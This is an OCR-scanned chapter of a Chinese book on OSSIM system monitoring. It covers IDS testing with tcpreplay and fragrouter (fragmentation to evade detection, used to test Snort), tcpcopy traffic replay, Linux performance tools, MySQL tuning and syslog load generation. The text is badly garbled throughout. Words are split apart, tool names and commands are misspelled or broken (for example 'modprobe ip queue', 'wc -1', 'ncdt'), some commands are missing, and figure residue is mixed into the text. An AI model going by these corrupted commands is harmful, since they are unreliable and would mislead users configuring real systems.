这 个 测试 工具 下 载 地 址 为 http://dl.packetstormsecurity.ne/UNIX/IDS/nidsbench/nidsbench.html 。 
Nidsbench 工具 包 中 包括 两 款 工具 ， 都 包含 在 KALI Linux 光盘 中 ， 下 面 分 别 介绍 。 

1. tcpreplay 

tcpreplay 是 包 转 发 工具 , 它 可 以 直接 用 tepdump 抓 包 工具 保存 的 PCAP 文件 来 模拟 真实 的 
网 络 数据 环境 。 采 用 tcpdump+tcpreplay 或 者 wireshark+tcpreplay 回放 在 线 流量 , tcpdump 是 用 
于 抓 数据 包 ，tcpreplay 则 是 用 于 流量 重 放 。 还 可 以 通过 附带 的 tcprewrite 工具 对 数据 包 的 内 容 

AP 地 址 、MAC 等 ) 根据 需要 进行 修改 。 
tcpreplay 安装 在 BT 和 DEFT8 系统 中 非常 方便 COSSIM 中 自 带 )， 使 用 以 下 命令 即 可 : 
#apt-get install tcpreplay 


安装 tepreplay 包 时 ， 默 认 情况 下 安装 以 下 三 个 工具 ， 分 别 为 : 


(1) tcpprep: 用 来 划分 客户 端 和 服务 器 ， 并 区 分 PCAP 数据 包 的 流向 ， 即 划分 哪些 数据 
包 是 从 Client 端 发 出 的 ， 哪 些 数据 包 是 从 Server 端 发 出 的 。 

(2) tcprewrite: 此 工具 用 来 修改 2 层 (MAC 地 址 )、3 Jz (IP 地 址 ) 以 及 4 层 (PORT 
地 址 ) 的 报 文 。 

(3) tcpreplay: 它 是 真正 用 来 发 包 使 用 的 工具 ， 可 以 选择 主 网 卡 、 从 网 卡 、 发 包 速 率 等 。 
具体 使 用 方法 参见 5.6 节 问 题 13 内 容 。 

2.fragrouter 

Anzen 公司 开发 了 一 套 测试 软件 Nidsbench ， 它 包括 tcpreplay 和 fraqrouter 两 部 分 。 
tcpreplay 的 功能 同上 所 述 ， 而 fraqrouter 的 功能 是 通过 构造 一 系列 躲避 IDS 检测 的 攻击 ， 以 测 
试 检测 系统 的 正确 性 和 安全 性 。 

在 测试 过 程 中 ， 将 NidsBench 软件 在 测试 机 2 上 启动 ， 作 为 攻击 主机 测试 机 D) 向 目标 
主机 (测试 机 3) 的 所 有 攻击 都 经 过 测试 机 2 上 的 fragrouter 转发 ，fragrouter 可 以 将 数据 包 按 
要 求 大 小 分 片 ， 以 此 来 隐藏 攻击 行为 。 同 时 也 检测 OSSIM 上 的 Snort 是 否 可 以 识别 分 片 攻 击 。 
tcpreplay 将 正常 的 网 络 流量 重 放 ， 并 且 支 持 重 放 速 度 调节 ， 可 以 测试 IDS 在 各 种 负荷 情况 下 
的 检测 效率 。 

3. tcpcopy 在 线 回放 

由 于 在 系统 压力 大 时 就 无 法 使 用 tepdump (会 出 现 丢 包 情况 )， 而 且 tcpreplay 是 一 种 离线 
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回放 ， 可 能 导致 tepreplay 回放 的 时 候 网 络 环境 已 经 和 抓 包 时 不 同 。 最 重要 的 是 tcpreplay 对 上 
层 应 用 无 效 。 基 于 这 些 原因 我 们 采用 tcpcopy 工具 进行 在 线 回 放 。tcpcopy 主要 用 来 解决 TCP 
层 及 其 以 上 (如 http 协议 , Ftp 协议 ) 的 流量 复制 问题 , 适用 于 Server 的 流量 回放 。 mH. tcpcopy 
基于 session 一 个 TCP 连接 ， 一 个 session， 它 由 4 部 分 所 组 构成 ， 分 别 是 源 TP 地 址 、 源 端口 、 
目的 也 和 目的 端口 。 了 解 上 述 内 容 后 ， 我 们 继续 进行 测试 。 
(1) tcpcopy 安装 : 
从 网 址 https://github.com/wangbin579/tcpcopy/contributors 下 载 ， 并 安装 。 


#./configure --enable-debug 
#make 
#make install 


(2) 测试 方法 : 

在 测试 服务 器 端 操 作 如 下 : 

# iptables -I OUTPUT -p tcp --sport port -j NFQUEUE 

由 于 现在 的 Linux 主要 发 行 版 Kernel 都 在 3.5 以 上 ， 所 以 默认 就 采用 了 NFQueue， 所 以 
不 用 手工 再 次 加 载 ， 如 果 在 2.6 内 核 的 机 器 上 就 需要 输入 以 下 命令 。 注 意 : iptables 命令 中 的 
port 是 变量 ， 应 根据 具体 应 用 项 目 而 定 。 如 果 是 测试 Web 服务 一 般 是 80 端口 。 


# modprobe ip queue 
4 ./intercept 


(3) 在 On-line 服务 器 端 操作 如 下 : 

# ./tcpcopy -x localServer Port-target ServerIP: targetServer Port 

对 于 -x 参数 的 解释 : 

格式 : -x <transfer> 

Transfer 具体 格式 为 “服务 器 对 外 IP 地 址 :服务 器 应 用 端口 号 -测试 服务 器 IP 地 址 :测试 服 
务 器 应 用 端口 ” 或 者 “服务 器 应 用 端口 号 -测试 服务 器 IP 地 址 :测试 服务 器 应 用 端口 ”。Transfer 
ZEH <,” RJ IP 地 址 和 端口 号 之 间 用 “:” 隔 开 ， 服 务 器 应 用 端口 号 和 测试 服务 器 IP 地 
址 之 间 用 “-” 隔 开 。 

举例 : 

#./tcpcopy -x 80-192.168.0.2:18080 

复制 在 线 机 器 的 80 端口 应 用 的 请 求 到 192.168.0.2 上 面 的 18080 端口 ， 另 外 还 可 以 通过 -n 
参数 或 者 -f 参 数 放大 在 线 压力 ， 更 多 参数 大 家 参考 tcpcopy -h 帮助 信息 。 


4. 流量 查看 
当 命 令 发 出 时 需要 查看 流量 是 否 过 来 ， 有 两 种 方法 : 
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€ ”使 用 传统 的 netstat 命令 


#netstat -at |grep «port»|wc -1 

€ 使 用 nethogs (目前 最 新 版 本 0.8.0) 

5. 停止 测试 方法 

在 启动 测试 时 先 打开 intercept， 再 打开 tcpcopy， 如 果 停 止 测试 ， 那 么 先 关 闭 tepcopy, fi 
关闭 intercept。 

6. BT 中 的 网 络 压力 测试 工具 


在 BT 光盘 中 Applications—BackTrack— Stress Testing 一 Network Stress Testing 菜单 下 提供 
了 6 个 压力 测试 工具 。 我们 可 以 拿 它 们 作为 防火 墙 /IDS/IPS 的 性 能 测试 工具 。 下 面 以 hping T. 
具 举 例 说 明 它们 能 用 来 做 什么 。 

Hping 是 一 个 命令 行 下 使 用 的 TCP/IP 数据 包 组 装 /分 析 工 具 ， 其 命令 模式 很 像 Unix 下 的 
ping 命令 , 但 是 它 不 是 只 能 发 送 ICMP 回应 请 求 , 它 还 可 以 支持 TCP、UDP、ICMP 和 RAW-IP 
协议 ， 因 此 它 成 为 安全 审计 、 防 火 墙 测 试 工作 中 标 配 工具 。 

7. 负载 监测 

Debian Linux 系统 性 能 非常 不 错 , 不 过 有 时 候 由 于 加 载 了 不 必要 的 服务 或 启动 过 多 的 监听 
或 扫描 ， 那 么 同样 会 拖 垮 系 统 ，OSSIM 系统 不 像 对 外 访问 的 网 站 有 大 量 访问 量 ， 它 只 会 去 收 
集 数据 包 并 分 析 ， 所 以 对 于 负载 高 低 的 判断 和 以 往 的 Web 服务 器 不 太一 样 ，OSSIM 系统 在 哪 
些 情 况 下 会 高 负载 或 者 出 现 无 法 连接 呢 ? 当 系 统 出 现 过 多 机 器 的 漏洞 扫描 ， 此 时 系统 出 现 
nessus jobs.pl 和 openvassd 进程 占用 大 量 CPU 利用 率 和 磁盘 IO。 

另外 ， 我 们 还 可 以 选用 Iperf 这 一 开源 工具 测试 网 络 带 宽 的 情况 ， 用 数据 包 生 成 器 发 送 各 
种 包 ， 用 以 检测 IDS 的 性 能 。 经 过 以 上 这 些 工具 测试 ， 可 以 模拟 真实 环境 ， 提 前 查 出 问题 ， 
增强 上 线 信心 。 


性 能 分 析 工 具 实 例 


OSSIM 的 性 能 是 系统 运 维 人 员 必 须 关注 的 问题 ， 主 导 性 能 的 关键 因素 除了 内 存 、CPU 之 
bh A IO， 它 包括 了 磁盘 VO 和 网 络 WO， 如 果 遇 到 打开 Web UI 界面 比较 卡 的 情况 ， 首 先 
不 要 急于 优化 ， 如 果 需 要 优化 最 好 有 性 能 数据 支持 ， 更 不 建议 凭空 优化 。 

下 面 为 读者 介绍 几 个 常见 性 能 定位 工具 ， 以 便 寻 求 优化 方案 和 手段 , K 5-1 中 介绍 了 几 个 
实例 ， 下 面 讲 解 如 何 使 用 这 些 工 具 ， 例 如 : OSSIM 主机 的 响应 变 得 迟缓 ， 磁 盘 指示 灯 闪 烁 不 
停 ， 有 可 能 是 什么 问题 ? 


294 


第 5 章 OSSIM 系统 监测 工具 


5.3.1 sar 

sar (System Activity Reporter 系统 活动 情况 报告 ) 是 目前 Linux 上 全 面 的 系统 性 能 分 析 工 
具 ， 可 以 从 多 方面 对 系统 的 活动 进行 报告 ， 包括: 文件 的 读 写 情况 、 系 统 调用 的 使 用 情况 、 磁 
dit VO. CPU 效率 、 内 存 使 用 状况 、 进 程 活动 等 ， 往 往 利用 top 命令 和 sar 配合 使 用 ， 图 5-7 
所 示 为 每 秒 采 样 一 次 ， 连 续 5 次 的 CPU 使 用 情况 的 截图 。 


图 5-7 连续 5 次 的 CPU 使 用 情况 


上 面 显示 的 内 容 包 括 : 

€ %usr: CPU 处 在 用 户 模式 下 的 时 间 百 分 比 。 

€ %nice: CPU 处 在 低 优先 级 模式 下 的 时 间 百 分 比 。 
€  "osystem: CPU 处 在 系统 模式 下 的 时 间 百 分 比 。 
€ %iowait: CPU 等 待 输入 输出 完成 时 间 的 百分比 。 
€ "idle: CPU 空闲 时 间 百 分 比 。 


当然 ，sar 的 使 用 方法 远 不 止 介绍 的 这 些 ， 详 情 大 家 可 查看 sar 帮助 信息 。 


5.3.2 vmstat 

vmstat 也 是 一 款 常 见 的 监控 工具 ， 可 以 展现 给 定时 间 间 隔 的 服务 器 的 状态 值 , 包括 服务 器 
的 CPU 使 用 率 、 内 存 使 用 、 虚 拟 内 存 交 换 情 况 、IO 读 写 情况 。 如 图 5-8 所 示 ， 报 告 系统 高 负 
载 的 虚拟 内 存 、LIO 及 CPU 统计 信息 。 


8 10 1 
图 5-8 ”系统 高 负载 时 虚拟 内 存 CPU 统计 信息 
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其 中 “b” 列 ， 表 示 等 待 队列 中 的 进程 数 〈 等 待 /O)， 通 常情 况 是 接近 0， 而 图 中 数值 很 
高 。“wa” 列 一 般 小 于 40， 图 中 平均 在 80-90 表示 磁盘 很 忙 。 在 “io” 字 段 下 方 ,“bi” 代 表 
从 磁盘 读 入 的 块 ,“bo” 代 表 写 入 磁盘 的 块 ， 从 图 中 看 出 读 写 都 很 繁忙 。 下 面 我 们 看 个 低 负 载 
状态 的 情况 对 比 一 下 ， 如 图 5-9 所 示 。 


图 5-9 低 负载 报告 系统 统计 信息 


5.3.3 用 iostat 分 析 l/O 子 系统 

iostat 用 于 报告 CPU 统计 信息 和 整个 系统 、 适 配器 、 磁 盘 和 CD-ROM 的 输入 /输出 统计 
信息 。 先 看 下 面 的 实例 ， 如 图 5-10 所 示 。 图 中 “rs” 表 示 每 秒 读 取 扇 区 数 ,“w/s” 表 示 每 秒 
写 入 扇 区 数 ,“avgqu-sz” 是 平均 请 求 队列 长 度 ， 队 列 长 度 越 短 越 好 。“await” 表 示 每 个 IO 请 
求 的 处 理 平 均 时 间 ， 这 里 可 以 理解 为 UO 的 响应 时 间 ， 如 果 大 于 10ms 系统 反应 较 慢 。%util 
显示 了 正 被 使 用 的 磁盘 通道 的 IO， 这 个 值 越 接近 100%， 表 示 系 统 越 满 负荷 运行 。 图 中 sda 
的 %util 一 度 达到 了 99.01, 显然 系统 IO 出 了 状况 。%iowait 表示 系统 等 待 VO 操作 完成 的 时 间 。 

#iostat -d -x -k 1 10 \\ 代 表 查 看 设备 使 用 率 (tutil) 响应 时 间 (await); 

#iostat -d 2 \\ 代 表 每 2 秒 间隔 持续 显示 报告 ; 


图 5-10 用 iostat 查看 设备 使 用 率 
观察 多 块 磁盘 的 访问 负载 状况 ， 结 果 如 图 5-11 所 示 。 
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图 5-11 多 块 盘 使 用 情况 
再 来 看 下 面 这 条 命令 的 作用 。 
#iostat -d -c -x 2 
这 条 命令 的 作用 是 打开 设备 、CPU 以 及 扩展 的 状态 信息 ,通常 我 们 在 检测 数据 库 性 能 时 ， 


除了 使 用 这 个 命令 之 外 ， 最 常见 的 还 是 使 用 mysqltuner.pl 工具 ,来 检查 数据 库 服 务 器 的 工作 状 
态 。 对 于 它 的 详细 使 用 方法 读者 可 以 参见 我 的 博客 http://chenguang.blog.51cto.com/ 。 


5.3.4 dstat 
dstat 是 一 个 比 vmstat、iostat、netstat 更 实用 的 工具 ， 它 与 sysstat 相 比 ，dstat 拥有 和 ccze 
- 样 的 彩色 界面 ， 在 手动 观察 性 能 状况 时 ， 数 据 之 间 容 易 区 分 ， 而 且 dstat 也 可 以 收集 制定 的 
资源 ， 例 如 CPU 使 用 情况 ， 命 令 为 “dstat -rc”。 


#apt-get install dstat 

软件 安装 完成 ， 执 行 dstat 命令 ， 默 认 会 收集 CPU、 磁盘、 网 络 及 系统 的 数据 ， 频 率 是 每 
秒 收集 一 次 。 

使 用 方法 举例 ， 下 面 为 异常 OSSIM 系统 的 dstat 统计 数据 ， 显 示 效 果 如 图 5-12 所 示 。 


#dstat -tclmdny 1 


idl wai hiq siq 


zi 
1 
1 
zi 
1 
1 
1 
zi 
1 
zi 
zl 
1 
a 
ri 
1 
1 
1 


oo 


图 5-12 系统 异常 的 统计 效果 
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图 5-13 系统 正常 时 统计 效果 
推荐 使 用 的 参数 是 “dstat -cdlmnpsy”， 设 置 别 名 链接 。 


#alias dstat-'dstat -cdlmnpsy' 


€ -c 显示 CPU 信息。 
-d: 显示 磁盘 信息 。 
-: 显示 load 信息 。 
-m: 显示 内 存 信息 。 
-n: 显示 网 络 信息 。 
-p: proc 进程 信息 。 
-s: 显示 swap 信息。 


5.3.5 iotop 

iotop 命令 是 专门 显示 硬盘 IO 的 命令 ， 界 面 风格 类 似 top 命令 。 如 果 知 道 有 程序 在 占用 系 
统 硬盘 的 IO 通道 , 但 是 又 无 法 确定 哪 一 个 程序 在 占用 硬盘 的 IO， 请 试 试 iotop 这 一 工具 , 其 
运行 效果 如 图 5-14 所 示 。 


TID PRIO USER DISK READ DISK WRITE SWAPIN 107 COMMAND 


图 5-14 iotop 运行 效果 


具体 使 用 : 可 以 用 左右 箭头 操作 ， 按 “r” 代 表 相反 方向 ， 按 “o” 代 表 动 态 切换 。 用 法 为 
“iotop 参数 ”， 参 数 说 明 如 下 : 
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-version: 查看 版 本 信息 。 

-h, -help: 查看 帮助 信息 。 

-b, -batch: 批量 处 理 用 来 记录 日 志 。 

-n 数值 : 设 定 循环 几 次 。 

-d SEC,-delay=SEC: 设 定 显示 时 间 间 隔 。 


5.3.6 atop 

atop 能 以 一 定 的 频率 记录 系统 的 运行 状态 ， 所 采集 的 数据 包含 系统 资源 (CPU、 内 存 、 磁 
盘 和 网 络 ) 使 用 情况 和 进程 运行 情况 ， 并 能 以 日 志文 件 的 方式 保存 在 磁盘 中 。 在 atop 执行 时 
通过 按 “m” 键 查看 内 存 视图 ， 按 “c” 键 查看 命令 行 视图 ， 这 样 便于 故障 查询 ， 当 服务 器 出 
现 问题 后 ， 我 们 还 可 获取 相应 的 atop 日 志文 件 进行 进一步 分 析 。 

以 上 列举 工具 atop, htop, iotop. iftop 以 及 mytop 都 是 OSSIM 系统 中 提供 的 优秀 工具 软 
件 ， 类 似 top 命令 风格 ， 易 学 易 用 。 此 外 还 有 些 更 高 深 的 内 核 级 性 能 调试 诊断 工具 kprobe、 
systemtap 等 可 以 解决 更 加 复杂 的 性 能 问题 。 


5.3.7 替代 netstat 的 工具 ss 
OSSIM 下 除了 提供 netstat 工具 以 外 ， 还 提供 了 它 的 替代 品 ss 工具 ， ss 是 Socket Statistics 的 
缩写 ， 顾 名 思 义 ss 命令 可 以 用 来 获取 socket 统计 信息 ， 它 可 以 显示 和 netstat 类 似 的 内 容 。 但 ss 的 
优势 在 于 它 能 够 显示 更 多 、 更 详细 的 有 关 TCP 和 连接 状态 的 信息 ， 而 且 比 netstat 更 快速 ， 更 高 效 。 
当 服 务 器 的 Socket 连接 数量 变 得 非常 大 时 ， 无 论 使 用 netstat 命令 , 还 是 直接 cat /proc/net/tep, AT 
速度 都 会 很 慢 ， 当 连接 达到 上 万 时 ， 系 统 有 可 能 停滞 ， 而 用 ss 命令 可 以 为 你 节约 大 量 等 待 时 间 。 
应 用 举例 : 


€ #ss-l: 查看 所 有 打开 的 网 络 端口 ， 当 服务 器 产生 大 量 sockets 连接 时 ， 可 使 用 这 个 命 
令 在 做 全 局 统计 。 

Hss-s: 查看 当前 服务 器 的 网 络 连接 统计 。 

#ss -pl: 列 出 打开 端口 的 具体 程序 名 称 ， 这 对 分 析 OSSIM 系统 非常 有 帮助 。 

#ss -a: 查看 这 台 服 务 器 上 所 有 的 socket 连接 。 

#ss -ta: 查看 TCP sockets。 

#ss -ua: 查看 UDP sockets, 

#ss -xa: 查看 UNIX sockets。 


OSSIM 平台 中 MySQL 运行 状况 


5.4.1 影响 MySQL 性 能 的 因素 
在 OSSIM 系统 中 MySQL 数据 库 采用 的 是 InnoDB 引擎 ， 那 么 对 于 性 能 最 主要 的 影响 因 
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素 就 是 磁盘 IJO， 其 次 是 内 存 。 如 果 大 家 在 服务 器 中 采用 了 SSD (固态 硬盘 )， 那 么 磁盘 VO 
这 一 问题 就 基本 可 以 忽略 不 计 ， 因 为 它 的 IO 比 机 械 硬盘 大 得 多 ,所 以 将 常规 机 械 硬盘 更 换 为 
SSD 是 一 种 不 错 的 选择 。 如 果 仅 采用 机 械 硬 盘 ， 那 么 推荐 通过 采用 RAID1+0 的 方式 提升 磁盘 
性 能 ， 因 为 这 种 方式 的 读 、 写 性 能 优 于 RAIDS. 
下 面 看 看 内 存 。 在 MySQL InnoDB 引擎 中 ， 内 存 的 大 小 直接 反映 出 数据 库 性 能 的 优 劣 ， 
因为 它 在 内 存 里 有 一 块 儿 叫 做 Buffer Pool 缓冲 池 ， 数 据 和 索引 页 都 存放 在 这 里 读 写 ， 这 样 做 
就 比 放 在 磁盘 上 读 写 快 得 多 。 那 么 如 何 优化 Buffer Pool UE? 它 涉及 的 参数 为 
innodb buffer pool size, 系统 默认 为 8MB, 如 果 不 修改 直接 使 用 , 当 OSSIM 监控 主机 较 少时 
] 志 收集 量 不 多 ， 是 没有 问题 的 。 如 果 OSSIM 负载 增 大 ， 在 检索 日 志 时 ， 响 应 时 间 比 较 长 ， 
这 时 我 们 可 以 考虑 增 大 这 个 数值 ， 一 般 原 则 是 增加 50~70% 的 内 存 大 小 ， 如 果 内 存在 24GB 以 
上 ， 那 么 可 考虑 增加 80% 的 内 存 。 

上 述 内 容 是 从 硬件 上 考虑 如 何 优化 数据 库 ， 如 果 SQL 查询 出 现 问题 ， 同 样 会 导致 性 能 下 
降 ， 我 们 要 通过 日 常 的 监控 来 发 现 这 类 问题 ， 系 统 操作 方法 以 后 再 具体 介绍 。 

MySQLReport 是 一 个 用 Perl 语言 编写 的 MySQL 数据 库 监控 脚本 ， 它 把 MySQL 数据 库 
的 运行 状态 值 〈show status). 以 更 友好 的 方式 显示 出 来 ， 通 过 它 可 以 方便 地 查看 MySQL 数据 
库 的 运行 状况 ， 效 果 如 图 5-15 所 示 。 

#wget http://hackmysql.com/scripts/mysqlreport-3.5.tgz 


#tar zxvf mysqlreport-3.5.tgz 
#cd mysglreport-3.5 


运行 方法 如 下 所 示 : 
#./mysqlreport -user root -password jITg1VxAQB 


UPDATE 
DELETE 
REPLACE 


图 5-15 MySQLReport 运行 效果 


如 果 监 控 的 是 远程 主机 上 的 MySQL 数据 库 ， 需 要 添加 主机 选项 : 


#./mysqlreport --host 172.20.16.117 --user admin --password 1 
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如 果 需 要 查看 mysqlreport 的 所 有 选项 ， 执 行 命令 : 
mysqlreport -help 00000000 


5.4.2 ”系统 的 IOPS 

Spew 是 OSSIM 系统 中 专业 的 磁盘 性 能 测试 工具 ， 它 比 dd 工具 更 好 用 。 它 有 个 参数 需要 
注意 ， 即 IOPS (Input/Output Operations Per Second)， 每 秒 进行 读 写 (/OO 操作 的 次 数 ， 多 用 
于 数据 库 等 场合 ,表明 数据 库 的 IOPS 和 磁盘 密切 相关 。 本 小 节 我 们 介绍 一 下 spew 这 款 工 具 ， 
首先 开始 安装 spew。 
tapt-get install spew — 


应 用 举例 : 
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Cumulative RTR: 
Iteration: 

Cumulative WTR: 
Cumulative RTR: 


Cumulative RTT: 
Total run time: 
Cumulative WTT: 
Cumulative RTT: 


Iteration: 1 (32% writing) Total run time: 00:00:04 
Iteration WTR: 75377.26 KiB/s Iteration WTT: 00:00:04 
Cumulative WTR: 76435.04 KiB/s Cumulative WTT: 00:00:04 
Cumulative RTR: Cumulative RTT: 00:00:00 


W-W-W-W-W-W-W-W—-W-W-W—-W-W-W—-W-W-W-W-W-W-W-W-W--W-W-W-W-W-W-W-W-W 4$ 153878.82 KiB/s 
82776.77 KiB/s 
63053.32 KiB/s 
79169.20 KiB/s 


70875.61 KiB/s 


W—W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-wW-W-W-W-W-wW-Ww 7$ 
W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-w 11$ 
W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-wW-w 14% 


W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-W-w-w 18$ 


Spew 的 开关 数量 多 达 几 十 项 ， 有 关 详细 操作 请 大 家 查看 帮助 。 


Syslog 压力 测试 工具 一 一 Mustsyslog 使 用 


通常 我 们 使 用 logger 工具 对 日 志 系 统 进行 测试 ， 下 面 先 看 个 简单 的 例子 。 

#for i in {11..2000}; do logger -i -t "cgweb test" -p local3.info "message" "$i"; 
sleep 0.1;done 

€ i: 逐 行 记录 每 一 次 logger 的 进程 ID. 

€ -p 指定 输入 消息 的 优先 级 ， 优 先 级 可 以 是 数字 或 指定 为 “facility.level” 的 格式 ， R 

认 级 别 是 “user.notice”。 比 如 : “-p local3.info” 这 个 设备 的 消息 级 别 为 info. 
© -t 指定 标记 记录 。 
€ sleep 0.1: 用 来 控制 发 送 速度 ， 表 示 发 送 频率 为 0.1 秒 。 


接着 在 另 一 个 控制 台 输 入 : 


#tcpdump host your-ip-address and port 514 // 监 听 发 往 主机 (your-ip-address) 514 
端口 的 数据 包 // 


#tail -f /var/log/message 

通过 tail 命令 即 可 观察 接收 的 大 量 日 志 ， 我 们 发 现 logger 的 功能 过 于 简单 ， 无 法 满足 对 
syslog 服务 器 的 测试 。 本 节 为 大 家 介绍 的 Mustsyslog， 不 仅 可 以 模拟 真实 的 UDP syslog 流量 ， 
修改 日 志 消 息 内 容 、 源 IP 地 址 ， 还 提供 多 种 日 志 模板 ， 用 户 只 要 通过 XML 定制 ， 就 能 快速 
生成 符合 自己 环境 需要 的 模板 ， 下 面 介 绍 其 安装 方法 。 


5.5.1 安装 mustsyslog 
下 载 mustsyslog 工具 : 
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压缩 包 内 包含 了 主 脚本 文件 ， 模 板 文件 和 包 依 赖 模块 、2 个 实例 文件 及 安装 说 明 等 。 
实验 环境 : kali-linux-1.0.9a-i386.iso 
启动 系统 进入 图 形 界面 后 打开 终端 ， 启 动 SSH 服务 。 接 着 安装 CPAN， 操 作 如 下 : 


root@kali:/tmp/must-2-0-beta# perl -MCPAN -e shell 

CPAN.pm requires configuration, but most of it can be done automatically. 
u answer 'no' below, you will enter an interactive dialog for each 
iguration option instead. 


would you like to configure as much as possible automatically? [yes] 


Autoconfiguration complete. 
commit: wrote '/root/.local/share/.cpan/CPAN/MyConf ig. pm" 
You can re-run configuration any time with 'o conf init' in the CPAN shell 


Epan, shell -- CPAN exploration and modules installation (v2.05) 
nter 'h' for help. 


cpan[il- 目 
进入 cpan[1]> 提 示 符 状态 ， 依 次 安装 三 个 Perl Hitt: XML: TreeBuilder, Time::HiRes, 
List::Util。 


Span， 于 > install xnL:Treesuilder ail 
Fetching with LwP: 


hetp: // We Cpan- org/authors/O1mailrc.txt. 
oot /. local /share/. cpan/sources. authors /O1mai rc. txt 


. DONE 


. cpan. org/modules /02packages. details. t: LH 
* /root/. local /share/. cDan/sQur ces /mudu ies /o packages. details.txt.gz" 
Database was generated on Mon, 31 Aug 2015 02:17:0. 
New CPAN.pm version (v2.10) available. 
[Currenriy, cunning version is v2.05] 
You might want to try 
install CPAN 
reload cpan 
to both upgrade CPAN.pm and run the new version without leaving 
the current session. 


+ . DONE 


http://www. cpan. org/modules /03modlist.data.gz 
Reading pp local/share/. cpan/sour ces /addules/03nod ist. data.gz" 


witing /root/. local/share/. cpan/Metadata 

Running insta 1 for module ^xwL::TreeBuilder* 

Fetching with LwP: 

http://www. cpan. org/authors/id/3/3F/JFEARN/XML-TreeBuilder-5.4.tar.gz 


继续 执行 下 面 操 作 〈 注 意 大 小 写 )。 
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cpan[2]> install Time::HiRes 
Time::HiRes is up to date (1.9726). 


cpan[3]- install List::Util -«— — — 

Running install for module 'List::util" 

Fetching with LwP: 

http://www. pan. org/authors/id/P/PE/PEVANS/Scalar-List-Utils-1.42.tar.gz 

Fetching with LwP: 

http://www. cpan. org/authors/id/P/PE/PEVANS/CHECKSUMS 

ecc m for /root. . local /share/. cpan/sources /authors /id/P/PE/PEVANS/Scalar-List-Ut 
5-1.42.tar.gz ol 


Check: your kit is complete... 


Cont iguring P/PE/PEVANS/Scalar-List-Utils-1.42.tar.gz with Makefile.PL 
ng i 
Looks qood 


输入 exi 退出 环境 ， 开 始 执行 mustsyslog 程序 : 


使 用 方法 : 


关键 参数 : 


€ -f 文件 名 .gnr: 日 志 模板 文件 
© -t 日 志 发 送 目的 IP 


在 must-2-0-beta 目录 下 samples 有 两 个 系统 自 带 的 模板 可 直接 使 用 。 


要 想 让 OSSIM 处 理 转发 syslog 来 的 日 志 ， 必 须 在 Sensor. 上 先 启用 syslog 插件 。 


5.5.2 “日志 模板 设计 
实例 包 中 包含 以 下 标签 : 


«LOG GENERATOR [options]? 
XPARAMETER [options] /> 
XPARAMETER [options] /> 


《SEQUENCE [options]> 
«STEP [options]? 


</STEP> 
X/SEQUENCE» 


《STEP [options]? 


</STEP> 
</SEQUENCE> 


«LOG [options]? 


</LOG> 
</LOG_GENERATOR> 
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这 些 模板 的 标签 编写 顺序 是 日 志 、 序 列 和 参数 。 


5.5.3 日志 标签 说 明 
日 志 消息 被 包 庄 在 <LOG[ 选 项 ] >...</LOG> 标 签 中 ， 这 个 标签 的 参数 有 4 个 。id=" 整 数 "。 
src-"ip": 发 送 LOG 设备 的 IP 地址 ，UDP 包 格 式 符合 RFC3164 规范 (在 RFC3164 中 定义 了 
syslog 日 志 协 议 )。facility="string": 日 志 设 备 编码 到 优先 级 头 部 ， 含 义 参 考 第 7 章 。 
severity-"string": 日 志 严 重 程度 的 优先 级 头 部 ， 含 义 参 考 第 7 章 。 
LOG 标签 实例 : 
<LOG id-"1" src-"192.168.1.1" facility-"local7" severity="info"> 


5.5.4” 域 标签 举例 
日 志 标 记 定 义 日 志 消 息 , 日 志 消 息 模板 基本 上 是 一 个 文本 字符 串 , 其 中 域内 定义 的 文本 内 
有 {field} 标 签 一 条 日 志 消 息 定义 在 <MESSAGE></MESSAGE> 标 签 之 间 ， 例 如 : 


<MESSAGE>Apache HTTP/GET 1.1 /{{PAGE}} requested by {{SRCIP}} 404 
error</MESSAGE> 


复杂 的 例子 : 

<LOG id="5" src-"192.168.1.1" facility="local7" severity="info"> 
<MESSAGE>Apache HTTP/GET 1.1 /{{PAGE}} requested by{{SRCIP}}</MESSAGE> 
<FIELD name="SRCIP" type="ip" value="31.100.1-10.1-5" /> 

<FIELD name="PAGE" type="text" 

value-"index.htm,pagel.htm,page2.htm" /> 

</LOG> 


常见 问题 解答 


1. OSSIM 系统 空间 不 足 ， 需 要 在 哪里 查找 大 型 文件 


OSSIM 出 现 空间 紧张 问题 ， 需 要 查看 /var/ 目 录 ， 那 么 有 哪些 方法 定位 呢 ? 首先 ， 我 们 从 
宏观 上 查看 文件 系统 的 空间 使 用 情况 : df-aT. 

我 们 可 以 列 出 常见 目录 的 大 小 ， 例 如 /var ~ /usr. 

下 面 以 /var/ 目 录 为 例 查询 占 空间 前 5 的 情况 。 

alienvault:~# du -s /var/* |sort -rn|head 

876M — /var/lib 

700M — /var/cache 

580K /var/spool 
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如 果 使 用 “tree -s” 能 列 出 每 个 目录 及 文件 大 小 。 不 过 tree 命令 也 能 列 出 树 型 目录 ， 但 无 
法 显示 每 个 文件 的 大 小 ， 接 下 来 介绍 的 “ncdt” 命 令 就 能 解决 这 个 问题 ， 这 个 命令 通过 apt-get 
install ncdt 安装 。 

对 于 这 个 命令 我 们 稍 加 变形 ， 就 能 列 出 占 空间 最 小 的 S 个 目录 。 


如 果 想 从 根 目录 开始 搜索 大 小 超过 20MB 的 文件 ， 可 以 使 用 如 下 命令 : 


查找 /var/log/apache2 目录 中 更 改 时 间 在 7 日 以 前 的 普通 文件 ， 并 在 删除 之 前 询问 : 
| | 


2. 认识 OSSIM 中 内 存 消耗 大 户 


初学 者 往往 对 OSSIM 系统 的 硬件 要 求 之 高 并 不 理解 ， 本 文 就 谈 谈 占用 内 存 多 的 服务 除 操 
作 系统 本 身 以 外 ， 其 他 子 系统 也 在 消耗 大 量 内存 : 


(1) iptables 链 、 表 及 规则 都 消耗 有 限 的 系统 内 存 ， 而 且 规 则 加 载 越 多 消耗 内 存 越 大 。 
C2) Snort 模块 工作 时 消耗 CPU 计算 资源 ， 它 的 规则 同时 也 消耗 大 量 内 存 ， 我 们 知道 ， 
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利用 Snort 可 以 将 SPAN 过 来 的 流量 进行 深度 包 检测 , 这 时 系统 需要 对 数据 包 的 内 容 进行 识别 、 
分 析 和 分 类 , 将 采用 基于 字符 串 的 多 模式 匹配 算法 和 基于 正则 表达 式 的 多 模式 匹配 算法 , 这 样 
